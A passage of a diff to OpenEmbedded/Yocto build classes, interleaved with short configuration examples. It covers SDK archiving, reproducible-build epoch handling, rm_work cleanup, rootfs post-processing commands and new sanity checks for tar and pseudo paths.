+ d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
else:
d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
-PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
+PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
SDK_DEPENDS += "nativesdk-glibc-locale"
# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,6 +180,8 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
+PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
+
fakeroot create_sdk_files() {
cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
@@ -256,7 +260,7 @@ fakeroot create_shar() {
rm -f ${T}/pre_install_command ${T}/post_install_command
- if [ ${SDK_RELOCATE_AFTER_INSTALL} -eq 1 ] ; then
+ if [ "${SDK_RELOCATE_AFTER_INSTALL}" = "1" ] ; then
cp ${TOOLCHAIN_SHAR_REL_TMPL} ${T}/post_install_command
fi
cat << "EOF" >> ${T}/pre_install_command
@@ -273,6 +277,7 @@ EOF
# substitute variables
sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
-e 's#@SDKPATH@#${SDKPATH}#g' \
+ -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -322,6 +327,13 @@ def sdk_variables(d):
do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
+python () {
+ variables = sdk_command_variables(d)
+ for var in variables:
+ if d.getVar(var, False):
+ d.setVarFlag(var, 'func', '1')
+}
+
do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
${TOOLCHAIN_SHAR_EXT_TMPL}:True"
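
With the zip options factored out into SDK_ZIP_OPTIONS, a distro or local configuration can adjust them without redefining SDK_ARCHIVE_CMD. A minimal sketch, assuming a zip-type SDK is wanted (the extra -9 compression level is purely illustrative):

    SDK_ARCHIVE_TYPE = "zip"
    SDK_ZIP_OPTIONS = "-y -9"
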
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
f.write("%s %s %s\n" % (info[1], info[2], info[3]))
}
-SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
+SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
@@ -247,7 +247,9 @@ python copy_buildsystem () {
# Create a layer for new recipes / appends
bbpath = d.getVar('BBPATH')
- bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')])
+ env = os.environ.copy()
+ env['PYTHONDONTWRITEBYTECODE'] = '1'
+ bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
# Create bblayers.conf
bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
# Hide the config information from bitbake output (since it's fixed within the SDK)
f.write('BUILDCFG_HEADER = ""\n\n')
+ # Write METADATA_REVISION
+ # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
+ f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
+
f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
f.write('WITHIN_EXT_SDK = "1"\n\n')
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
# A bit of another hack, but we need this in the path only for devtool
# so put it at the end of $PATH.
- echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script
+ echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
diff --git a/meta/classes/pypi.bbclass b/meta/classes/pypi.bbclass
index 87b4c85fc0..c68367449a 100644
--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
+
+CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"
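
The new default maps pypi-based recipes onto the "python" vendor prefix used in the NVD data; a recipe whose CVE product name differs can still override it. A hypothetical recipe fragment:

    CVE_PRODUCT = "python:pillow"
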
diff --git a/meta/classes/python3native.bbclass b/meta/classes/python3native.bbclass
index d98fb4c758..2e3a88c126 100644
--- a/meta/classes/python3native.bbclass
+++ b/meta/classes/python3native.bbclass
@@ -17,8 +17,6 @@ export STAGING_LIBDIR
export PYTHON_LIBRARY="${STAGING_LIBDIR}/lib${PYTHON_DIR}${PYTHON_ABI}.so"
export PYTHON_INCLUDE_DIR="${STAGING_INCDIR}/${PYTHON_DIR}${PYTHON_ABI}"
-export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
-
# suppress host user's site-packages dirs.
export PYTHONNOUSERSITE = "1"
diff --git a/meta/classes/python3targetconfig.bbclass b/meta/classes/python3targetconfig.bbclass
new file mode 100644
index 0000000000..a6e67f1bf8
--- /dev/null
+++ b/meta/classes/python3targetconfig.bbclass
@@ -0,0 +1,29 @@
+inherit python3native
+
+EXTRA_PYTHON_DEPENDS ?= ""
+EXTRA_PYTHON_DEPENDS_class-target = "python3"
+DEPENDS_append = " ${EXTRA_PYTHON_DEPENDS}"
+
+do_configure_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_configure_prepend_class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile_prepend_class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install_prepend_class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
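
A recipe that needs the target Python configuration while cross-compiling would simply inherit the new class; a hypothetical recipe fragment:

    inherit python3targetconfig
    # _PYTHON_SYSCONFIGDATA_NAME is then exported for do_configure/do_compile/do_install
    # so the build system reads the target python3 sysconfigdata, not the native one.
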
diff --git a/meta/classes/qemuboot.bbclass b/meta/classes/qemuboot.bbclass
index 648af09b6e..92ae69d9f2 100644
--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
# QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
#
# QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
+# e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
#
# QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
#
@@ -75,7 +76,7 @@
QB_MEM ?= "-m 256"
QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
-QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}"
+QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
QB_DEFAULT_FSTYPE ?= "ext4"
QB_OPT_APPEND ?= "-show-cursor"
QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"
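
The QB_DEFAULT_KERNEL change lets runqemu pick the bundled initramfs image automatically when bundling is enabled. A sketch of the relevant local.conf settings (the initramfs image name is illustrative):

    INITRAMFS_IMAGE = "core-image-minimal-initramfs"
    INITRAMFS_IMAGE_BUNDLE = "1"
    # QB_DEFAULT_KERNEL then expands to something like bzImage-initramfs-qemux86-64.bin
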
diff --git a/meta/classes/report-error.bbclass b/meta/classes/report-error.bbclass
index 1a12db1206..de48e4ff0f 100644
--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
data['failures'] = []
data['component'] = " ".join(e.getPkgs())
data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
+ data['bitbake_version'] = e.data.getVar("BB_VERSION")
+ data['layer_version'] = get_layers_branch_rev(e.data)
data['local_conf'] = get_conf_data(e, 'local.conf')
data['auto_conf'] = get_conf_data(e, 'auto.conf')
lock = bb.utils.lockfile(datafile + '.lock')
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
# reproducible_build.bbclass
#
-# Sets SOURCE_DATE_EPOCH in each component's build environment.
+# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
+# The format is number of seconds since the system epoch.
+#
# Upstream components (generally) respect this environment variable,
# using it in place of the "current" date and time.
# See https://reproducible-builds.org/specs/source-date-epoch/
#
-# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH.
-# This value should be reproducible for anyone who builds the same revision from the same sources.
+# The default value of SOURCE_DATE_EPOCH comes from the function
+# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
+# is not available (or set to 0) will use the fallback of
+# SOURCE_DATE_EPOCH_FALLBACK.
+#
+# The SDE_FILE is normally constructed from the function
+# create_source_date_epoch_stamp which is typically added as a postfunc to
+# the do_unpack task. If a recipe does NOT have do_unpack, it should be added
+# to a task that runs after the source is available and before the
+# do_deploy_source_date_epoch task is executed.
+#
+# If a recipe wishes to override the default behavior it should set its own
+# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
+# with recipe-specific functionality to write the appropriate
+# SOURCE_DATE_EPOCH into the SDE_FILE.
+#
+# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should
+# be reproducible for anyone who builds the same revision from the same
+# sources.
#
-# There are 4 ways we determine SOURCE_DATE_EPOCH:
+# There are 4 ways the create_source_date_epoch_stamp function determines what
+# becomes SOURCE_DATE_EPOCH:
#
# 1. Use the value from __source_date_epoch.txt file if this file exists.
-# This file was most likely created in the previous build by one of the following methods 2,3,4.
+# This file was most likely created in the previous build by one of the
+# following methods 2,3,4.
# Alternatively, it can be provided by a recipe via SRC_URI.
#
# If the file does not exist:
@@ -22,25 +43,24 @@
# 3. Use the mtime of "known" files such as NEWS, CHANGELOG, ...
# This works for well-kept repositories distributed via tarball.
#
-# 4. Use the modification time of the youngest file in the source tree, if there is one.
+# 4. Use the modification time of the youngest file in the source tree, if
+# there is one.
# This will be the newest file from the distribution tarball, if any.
#
-# 5. Fall back to a fixed timestamp.
+# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
#
-# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE.
-# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
-# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
-#
-# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
-# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
+# Once the value is determined, it is stored in the recipe's SDE_FILE.
BUILD_REPRODUCIBLE_BINARIES ??= '1'
-inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')}
+inherit reproducible_build_simple
-SDE_DIR ="${WORKDIR}/source-date-epoch"
+SDE_DIR = "${WORKDIR}/source-date-epoch"
SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
+# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
+export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
+
SSTATETASKS += "do_deploy_source_date_epoch"
do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
import oe.reproducible
epochfile = d.getVar('SDE_FILE')
- # If it exists we need to regenerate as the sources may have changed
- if os.path.isfile(epochfile):
- bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
- os.remove(epochfile)
+ tmp_file = "%s.new" % epochfile
source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
bb.utils.mkdirhier(d.getVar('SDE_DIR'))
- with open(epochfile, 'w') as f:
+ with open(tmp_file, 'w') as f:
f.write(str(source_date_epoch))
+
+ os.rename(tmp_file, epochfile)
}
+EPOCHTASK = "do_deploy_source_date_epoch"
+
+# Generate the stamp after do_unpack runs
+do_unpack[postfuncs] += "create_source_date_epoch_stamp"
+
def get_source_date_epoch_value(d):
- cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH')
- if cached:
+ epochfile = d.getVar('SDE_FILE')
+ cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
+ if cached and efile == epochfile:
return cached
- epochfile = d.getVar('SDE_FILE')
- source_date_epoch = 0
- if os.path.isfile(epochfile):
+ if cached and epochfile != efile:
+ bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
+
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
+ try:
with open(epochfile, 'r') as f:
s = f.read()
try:
source_date_epoch = int(s)
except ValueError:
- bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s)
- source_date_epoch = 0
+ bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
- else:
+ except FileNotFoundError:
bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
- d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch))
+ d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
return str(source_date_epoch)
export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
-
-python () {
- if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
- d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
-}
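
As the updated header notes, a recipe can still take full control of the epoch. A minimal sketch that pins SOURCE_DATE_EPOCH to a fixed release timestamp by providing its own stamp function (the value written is purely illustrative):

    python create_source_date_epoch_stamp() {
        bb.utils.mkdirhier(d.getVar('SDE_DIR'))
        with open(d.getVar('SDE_FILE'), 'w') as f:
            # 2021-02-01 00:00:00 UTC, an arbitrary example timestamp
            f.write('1612137600')
    }
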
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
do_rm_work () {
+ # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
+ # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
+ RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
+ if [ -z "${RM_BIN}" ]; then
+ bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
+ fi
+
# If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
for p in ${RM_WORK_EXCLUDE}; do
if [ "$p" = "${PN}" ]; then
@@ -73,7 +80,7 @@ do_rm_work () {
# sstate version since otherwise we'd need to leave 'plaindirs' around
# such as 'packages' and 'packages-split' and these can be large. No end
# of chain tasks depend directly on do_package anymore.
- rm -f $i;
+ "${RM_BIN}" -f -- $i;
;;
*_setscene*)
# Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
;;
esac
done
- rm -f $i
+ "${RM_BIN}" -f -- $i
esac
done
@@ -100,9 +107,9 @@ do_rm_work () {
# Retain only logs and other files in temp, safely ignore
# failures of removing pseudo folders on NFS2/3 server.
if [ $dir = 'pseudo' ]; then
- rm -rf $dir 2> /dev/null || true
+ "${RM_BIN}" -rf -- $dir 2> /dev/null || true
elif ! echo "$excludes" | grep -q -w "$dir"; then
- rm -rf $dir
+ "${RM_BIN}" -rf -- $dir
fi
done
}
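
The exclusion check shown in context is driven by configuration; a sketch of a local.conf entry that preserves the work directories of selected recipes (the recipe names are illustrative):

    RM_WORK_EXCLUDE += "busybox linux-yocto"
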
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
# Zap the root password if debug-tweaks feature is not enabled
-ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}'
+ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
# Create /etc/timestamp during image construction to give a reasonably sane default time setting
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; "
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
# Generates test data file with data store variables expanded in json format
-ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; "
+ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
# Write manifest
IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
if os.path.exists(manifest_name) and link_name:
manifest_link = deploy_dir + "/" + link_name + ".manifest"
- if os.path.lexists(manifest_link):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
+ if manifest_link != manifest_name:
+ if os.path.lexists(manifest_link):
+ os.remove(manifest_link)
+ os.symlink(os.path.basename(manifest_name), manifest_link)
}
# Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
}
rootfs_check_host_user_contaminated () {
- contaminated="${WORKDIR}/host-user-contaminated.txt"
+ contaminated="${S}/host-user-contaminated.txt"
HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
@@ -339,9 +340,10 @@ python write_image_test_data() {
if os.path.exists(testdata_name) and link_name:
testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
- if os.path.lexists(testdata_link):
- os.remove(testdata_link)
- os.symlink(os.path.basename(testdata_name), testdata_link)
+ if testdata_link != testdata_name:
+ if os.path.lexists(testdata_link):
+ os.remove(testdata_link)
+ os.symlink(os.path.basename(testdata_name), testdata_link)
}
write_image_test_data[vardepsexclude] += "TOPDIR"
diff --git a/meta/classes/rootfs_deb.bbclass b/meta/classes/rootfs_deb.bbclass
index 2b93796a76..ef616da229 100644
--- a/meta/classes/rootfs_deb.bbclass
+++ b/meta/classes/rootfs_deb.bbclass
@@ -7,7 +7,7 @@ ROOTFS_PKGMANAGE = "dpkg apt"
do_rootfs[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot"
do_populate_sdk[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot bzip2-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_deb do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
do_populate_sdk[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
diff --git a/meta/classes/rootfs_ipk.bbclass b/meta/classes/rootfs_ipk.bbclass
index e73d2bfdae..f1e0219732 100644
--- a/meta/classes/rootfs_ipk.bbclass
+++ b/meta/classes/rootfs_ipk.bbclass
@@ -11,7 +11,7 @@ ROOTFS_PKGMANAGE = "opkg ${EXTRAOPKGCONFIG}"
do_rootfs[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_populate_sdk[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_ipk do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${WORKDIR}/ipk.lock"
do_populate_sdk[lockfiles] += "${WORKDIR}/ipk.lock"
diff --git a/meta/classes/rootfs_rpm.bbclass b/meta/classes/rootfs_rpm.bbclass
index 51f89ea990..ae0f541c49 100644
--- a/meta/classes/rootfs_rpm.bbclass
+++ b/meta/classes/rootfs_rpm.bbclass
@@ -24,7 +24,7 @@ do_rootfs[depends] += "${RPMROOTFSDEPENDS}"
do_populate_sdk[depends] += "${RPMROOTFSDEPENDS}"
do_rootfs[recrdeptask] += "do_package_write_rpm do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
python () {
if d.getVar('BUILD_IMAGES_FROM_FEEDS'):
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
ROOTFS_DEBUG_FILES ?= ""
ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;"
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
rootfs_debug_files () {
#!/bin/sh -e
echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 1486cce357..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
if len(msg) == 0:
msg = "%s.\n" % err
- msg += " Please ensure your host's network is configured correctly,\n"
- msg += " or set BB_NO_NETWORK = \"1\" to disable network access if\n"
- msg += " all required sources are on local disk.\n"
+ msg += " Please ensure your host's network is configured correctly.\n"
+ msg += " If your ISP or network is blocking the above URL,\n"
+ msg += " try with another domain name, for example by setting:\n"
+ msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
+ msg += " You could also set BB_NO_NETWORK = \"1\" to disable network\n"
+ msg += " access if all required sources are on local disk.\n"
retval = msg
return retval
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
version = result.split()[3]
if LooseVersion(version) < LooseVersion("1.28"):
return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
+
+ try:
+ result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
+ if "--xattrs" not in result:
+ return "Your tar doesn't support --xattrs, please use GNU tar.\n"
+ except subprocess.CalledProcessError as e:
+ return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
+
return None
# We use git parameters and functionality only found in 1.7.8 or later
@@ -619,6 +630,9 @@ def sanity_handle_abichanges(status, d):
f.write(current_abi)
elif int(abi) <= 11 and current_abi == "12":
status.addresult("The layout of TMPDIR changed for Recipe Specific Sysroots.\nConversion doesn't make sense and this change will rebuild everything so please delete TMPDIR (%s).\n" % d.getVar("TMPDIR"))
+ elif int(abi) <= 13 and current_abi == "14":
+ status.addresult("TMPDIR changed to include path filtering from the pseudo database.\nIt is recommended to use a clean TMPDIR with the new pseudo path filtering so TMPDIR (%s) would need to be removed to continue.\n" % d.getVar("TMPDIR"))
+
elif (abi != current_abi):
# Code to convert from one ABI to another could go here if possible.
status.addresult("Error, TMPDIR has changed its layout version number (%s to %s) and you need to either rebuild, revert or adjust it at your own risk.\n" % (abi, current_abi))
@@ -700,6 +714,23 @@ def check_sanity_version_change(status, d):
if (tmpdirmode & stat.S_ISUID):
status.addresult("TMPDIR is setuid, please don't build in a setuid directory")
+ # Check that a user isn't building in a path in PSEUDO_IGNORE_PATHS
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ workdir = d.getVar('WORKDIR', expand=True)
+ for i in pseudoignorepaths:
+ if i and workdir.startswith(i):
+ status.addresult("You are building in a path included in PSEUDO_IGNORE_PATHS " + str(i) + " please locate the build outside this path.\n")
+
+    # Check if PSEUDO_IGNORE_PATHS and paths under pseudo control overlap
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ pseudo_control_dir = "${D},${PKGD},${PKGDEST},${IMAGEROOTFS},${SDK_OUTPUT}"
+ pseudocontroldir = d.expand(pseudo_control_dir).split(",")
+ for i in pseudoignorepaths:
+ for j in pseudocontroldir:
+ if i and j:
+ if j.startswith(i):
+ status.addresult("A path included in PSEUDO_IGNORE_PATHS " + str(i) + " and the path " + str(j) + " overlap and this will break pseudo permission and ownership tracking. Please set the path " + str(j) + " to a different directory which does not overlap with pseudo controlled directories. \n")
+
# Some third-party software apparently relies on chmod etc. being suid root (!!)
import stat
